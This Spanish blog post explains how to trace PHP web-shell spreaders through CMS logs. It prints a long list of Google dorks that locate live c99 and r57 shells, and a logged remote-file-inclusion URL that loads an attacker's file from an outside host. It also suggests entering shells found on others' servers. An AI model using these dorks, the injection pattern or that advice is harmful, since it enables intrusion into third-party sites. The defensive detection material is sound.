Identificando Bot-Scanners Spreaders PHP

Para ampliar las imágenes, haga click sobre las mismas

La web captureflags, a día de hoy ha sufrido ésta desfiguración, causada por una personaje que responde al nick de  c0m37 o “h311c0m3 1337″. Ésto se podría entender viendo la siguiente captura de la misma web (Caché del googlebot) donde se puede ver que el sitio alojaba una shell (Con publicidad incluida!!). Google, posee un Bot realmente potente, el cual nos hace capturas instantaneas de las webs (dónde tiene permisos, claro), ésto puede ser una ventaja a la hora de localizar malhechores, si cuentas con ésta información:

Para ampliar las imágenes, haga click sobre las mismas

Dorks: Mediante la colocación de estos “codigos” en google (o cualquier otro buscador) obtendremos algunos resultados interesantes para después poder conseguir información de los usuarios que han creado, modificado y/o utilizado estas herramientas desfasadas pero aún efectivas para webs escritas en PHP. Son muy usados por los defacers en listados .txt extensos, automatizando mediante otros scripts PHP la búsqueda de vulnerabilidades.

Algunos de los dorks usados para encontrar Shells en Goolge podrían ser los siguientes:

filetype:php HAXPLORER “Server Files Browser”
intitle:r57shell +uname
intitle:MyShell 1.1.0 build 20010923
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php

Para ampliar las imágenes, haga click sobre las mismas

“Captain Crunch Security Team” inurl:c99
download c99.php
download c99.php
download c99.php
inurl:c99.php
inurl:c99.php
allinurl: c99.php
inurl:c99.php
allinurl: c99.php
inurl:”/c99.php”
allinurl: c99.php
inurl:c99.php
inurl:”c99.php” c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin

c99shell powered by admin
inurl:”/c99.php”
inurl:c99.php
inurl:c99.php
inurl:c99.php
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: “c99shell”
inurl:”c99.php
inurl:”c99.php
allinurl: “c99.php”
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: “c99.php”
inurl:c99.php
inurl:”c99.php”
inurl:”c99.php”
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:”c99.php” c99shell
inurl:c99.php

inurl:”c99.php”
allinurl:c99.php
inurl:”/c99.php
inurl:c99.php?
inurl:/c99.php+uname
allinurl:”c99.php”
allinurl:c99.php
inurl:”c99.php”
inurl:”c99.php”
allinurl:c99.php
allinurl:c99.php?
allinurl:c99.php?
allinurl:c99.php?
“inurl:c99..php”
allinurl:c99.php

c99shell [file on secure ok ]?
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
powered by Captain Crunch Security Team
allinurl:c99.php
“c99.php” filetype:php
allinurl:c99.php
inurl:c99.php
allinurl:.c99.php
“inurl:c99.php”
c99. PHP-code Feedback Self remove
allinurl:c99.php
download c99.php
allinurl:c99.php
inurl:c99.php
allinurl: “c99.php”
allinurl:c99.php
allinurl:c99.php

c99shell
inurl:c99.php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
allinurl:”c99.php”
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:/c99.php
inurl:”c99.php”
inurl:c99.php
inurl:c99.php
c99.php download
inurl:c99.php
inurl:”c99.php”
inurl:/c99.php
inurl:”c99.php?”
inurl:c99.php
inurl:c99.php
files/c99.php
c99shell filetype:php -echo
c99shell powered by admin
inurl:c99.php
inurl:c99.php
inurl:”c99.php”
inurl:c99.php uid=0(root)
allinurl:c99.php
inurl:”c99.php”
inurl:”c99.php”

inurl:”/c99.php” intitle:”C99shell”
inurl:”/c99.php” intitle:”C99shell”
inurl:”/c99.php” intitle:”C99shell”
C99Shell v. 1.0 pre-release build #5
inurl:c99.php
inurl:c99.php
–[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
inurl:"c99.php"
C99Shell v. 1.0 pre-release build #16!
c99shell v. 1.0 pre-release build #16
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]–
allinurl: “c99.php”
allinurl: “c99.php”
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
“c99shell v 1.0″
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell “Software: Apache”
allinurl: c99.php
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
c99shell v. 1.0 release security
c99shell v. 1.0 pre-release build
inurl:c99.php
c99shell [file on secure ok ]?
C99Shell v. 1.3
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php uid=0(root)
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16
c99shell[on file]ok
c99shell[file on ]ok
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
“C99Shell v. 1.0 pre”
=C99Shell v. 1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. pre-release build
inurl:c99.php c99 shell
inurl:c99.php c99 shell
powered by Captain Crunch Security Team
inurl:c99.php
inurl:c99.php
!C99Shell v. 1.0 pre-release build #5!
intitle:”c99shell” filetype:php root
intitle:”c99shell” Linux infong 2.4
C99Shell v. 1.0 beta !
C99Shell v. 1.0 pre-release build #
inurl:”c99.php”
allintext:C99Shell v. 1.0 pre-release build #12
“C99Shell v. 1.0 pre”
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:/c99.php?
allinurl:c99.php
intitle:C99Shell pre-release

inurl:”c99.php”
powered by Captain Crunch Security Team
inurl:c99.php
C99Shell v. 1.0 pre-release build #16!
allinurl:c99.php
C99Shell v. 1.0 pre-release build #16 administrator
intitle:c99shell filetype:php
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #12
c99shell v.1.0
allinurl:c99.php
“c99shell v. 1.0 pre-release build”
inurl:”c99.php” filetype:php
“c99shell v. 1.0 ”
ok c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. 1.0 pre-release build #16 |
!C99Shell v. 1.0 pre-release build #5!
!C99Shell v. 1.0 pre-release build #5!
allinurl:/c99.php
powered by Captain Crunch Security Team
inurl:c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
powered by Captain Crunch Security Team
inurl:c99.php
C99Shell v. 1.0 pre-release
inurl:c99.php
inurl:c99.php ext:php
inurl:”c99.php”
allinurl:”c99.php”
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout”
C99Shell v. 1.0 pre-release build #16 software apache
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
“c99shell v 1.0″
inurl:”c99.php”
allintitle: C99shell filetype:php
C99Shell v. 1.0 pre-release build #16!
“c99shell v. 1.0 pre-release”
c99shell v. 1.0 pre-release build #5
allinurl:”c99.php” filetype:php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!C99Shell v. 1.0 pre-release build #16!
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
inurl:c99.php
c99shell v. 1.0
allinurl: c99.php

–[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]–
inurl:”/c99.php”
c99shell +uname
c99shell php + uname
c99shell php + uname
–[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]–
allinurl:c99.php
!C99Shell v. 1.0 pre-release build #5!
C99Shell v.1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
intitle:c99shell filetype:php
“Encoder Tools Proc. FTP brute”
“c99″ filetype:php intext:”Safe-Mode: OFF”
c99shell v. 1.0 pre
inurl:c99.php
intitle:c99shell uname -bbpress
intitle:”index.of” c99.php
inurl:admin/files/
intitle:”index of /” “c99.php”
intitle:”index of” intext:c99.php
intitle:index.of c99.php
intitle:”index of” + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:”Index of/”+c99.php
c99.php “intitle:Index of ”
c99.php “intitle:Index of ”
c99.php “intitle:Index of ”
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
img.c99.php
intitle:”Index of/”+c99.php
“index of /” c99.php
c99.php
intitle:”Index of” c99.php
“index of” c99.php
“Index of/”+c99.php

…Usted mismo puede crear sus própios Dorks recabando información.

Cabe decir que la mayoría de las shells de arriba que usted pueda encontrar, no tendrán permisos de escritura para el “invitado” (levante el dedo del Control+C y deje de abrir nuevas pestañas:)) y son shells pbsoletas, honeypots, shells eliminadas, shells de los propios  Administradores del site, etc. Por supuesto que los usuarios crean sus propios Scripts PHP  adaptándolo a sus necesidades (FTP bruteforce, AutoBackdoor, MD5 decrypters..). También encontraremos shells creadas recientemente con nombres diferentes y dispares como la conocida c100 (.php, .txt, .gif…), o la variante  Locus7s, SaTeLuCo, y muchas otras, usted mismo puede encontrar alguna variante interesante para investigarla, utilizarla, o lo que usted crea conveniente.

Si usted encontrara una shell activa, utilizada por una pequeña comunidad (Puede saber esto por el mismo nombre de la shell ej:  L4M3RS.php, o porque podrá visualizar en la alguna parte del Script, dónde el orgulloso “hacker” ha dejado su sello adjudicándose la autoría o modificación del Script (Shell) de manera parecida a ésta: Recoded by L4M3R, Modified by L4M3R, coded by L4M3R,  o incluso dejándo una imagen de su própia comunidad.  Puede encontrar c99, r57, adaptadas a comunidades pero sin borrar la marca de Captain Crunch Security Team, por ejémplo, o alguna variación de la misma con marca própia, o códigos nuevos y própios, quién sabe. En definitiva, con nuestra web, un simple plugin similar a los descritos antes en nuestro CMS, llegaremos a tener listas inmensas de ataques, con los que nosotros, hábilmente recabaremos unos pocos nicks, o nombres, dirección de correo, y cualquier otro dato, para, al fín, dar con miles de comunidades que se dedican a todo lo expuesto anteriormente, la mayoría de los casos para desfigurar el índex y/o borrar directamente todos los datos de la carpeta pública, los llamados “deface” en la jerga Lamer.

Los “defacers” o “hackers” o “crackers” (o como usted crea oportuno llamarlos, ya que exísten cada día más términos aptos y usados globalmente para describir a estos individuos y comunidades) utilizan simples herramientas para cómodamente automatizar los dorks, como así automatizar la explotación de las vulnerabilidades web mediante pequeños script, programas y códigos, uno de ellos, y muy popular es FeeLCoMz.

Si usa un sistema CMS como Drupal, o Joomla busque e instale un plugin como JoomlaWatch , verá como “algunos visitantes”, intentan acceder a direcciones “raras” en su página, podrá verlo facilmente si se fija en la dirección (URL) completa a la que el “visitante” intenta acceder, porque o bién incluyen otra URL como en el ejemplo de más abajo, o porque usted se percata de algo sospechoso en esa dirección.

Si usa WordPress, hay un plugin realmente bueno para ésto y en varios días podrá comprobar como hay muchos intentos de RFI o bots que recaban información de su servidor, puede descargarlo el el siguiente link: Visitors Maps and Who’s Been Online.

Puede descargar éstos plugins e instalarlos mediante la interfaz web de su CMS o bién subir a mano los archivos con su cliente FTP a la carpeta de plugins de su CMS, para después activarlos normalmente y configurarlos como lo hace habitualmente. La mayoría de usuarios no se percatan de que  reciben a diario éstos intentos de atáque, pero, si usted es un poco perspicaz, podrá incluso encontrar:  quién, cómo, y desde dónde (IP o URL) se hicieron los intentos de “ataque” a su web.

En los logs de dichos plugins, podrá encontrar mucha información, como el referer, sistema operativo, navegador web, localización, información ISP y más información sensible, y lo más destacable en éste caso, la web a la que se accedió o se intentó acceder :

EJ : http://su-página-web.com/?cat=13%20%20//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt??

Si accede a la direccion marcada en rojo en el ejemplo superior y navega por los directorios de esa URL (desde el archivo usado para atacar ,en éste caso id1.txt) hasta la raiz (Home, Portada) del sitio web, podrá en algunos casos listar el servidor (ver que archivos aloja) desde el mismo navegador web (Según los permisos que tengan dichas carpetas y archivos) o bién puede averiguar ésto desde un software específico como por ejemplo Acunetix (Escáner de vulnerabilidades Web comercial).

Sabiedo la estructura completa del Site (Ej:http://www.protech.su/) y que archivos aloja podremos identificar seguramente muchos archivos malignos (EJ:c99.php,scaner.pl, scan.php, injektor.txt…), (Sino mire la cache de la web y verá cómo en su día si que estuvieron ) copiando “a mano” en nuestro navegador la URL competa donde se halla:  EJ: http://www.protech.su//images/zamki/c99.php —} (El archivo c99.php vemos que efectivamente está alojado por el servidor (Web) pero mediante la interfaz de la web obviamente no es accesible) podríamos llevarnos una sorpresa al ver que accedemos a una shell con permisos totales (Donde de paso, usted mismo puede eliminar SOLO y estrictamente los archivos maliciosos del sitio, y/o avisar al administrador de que actualice su sitio, vigíle sus archivos,  y corriga las vulnerabilidades de su web.

Les aseguro que si observan bién encontrarán herramientas de todo tipo, Shells, Scaners RFI en diferentes lenguajes; pearl, python, visual , c…, exploits de todo tipo, Trojans, Backdoors.. y un arsenal de herramientas maliciosas.

Éstas webs (EJ: http://www.protech.su/) , seguramente están “controladas” por usuarios malintencionados, y los verdaderos administradores del sitio,  sin saberlo  contribuyen con su hosting y web a seguir atacandoa su vez más webs. Por supuesto también hay sitios creados sólo para tal fín.

Si tiene los ojos abiertos y una web o CMS escrita en PHP, le sorprenderá ver la cantidad diaria de intentos de comprometer la integridad de su sitio.

Tagged with: bot • botnets • hacking • IRC • jatimcom • lamers

Fichero archivado: Vulnerabilidades • Web

Le gusto este articulo? Subscribete a mi RSS feed y obtener mas descargas!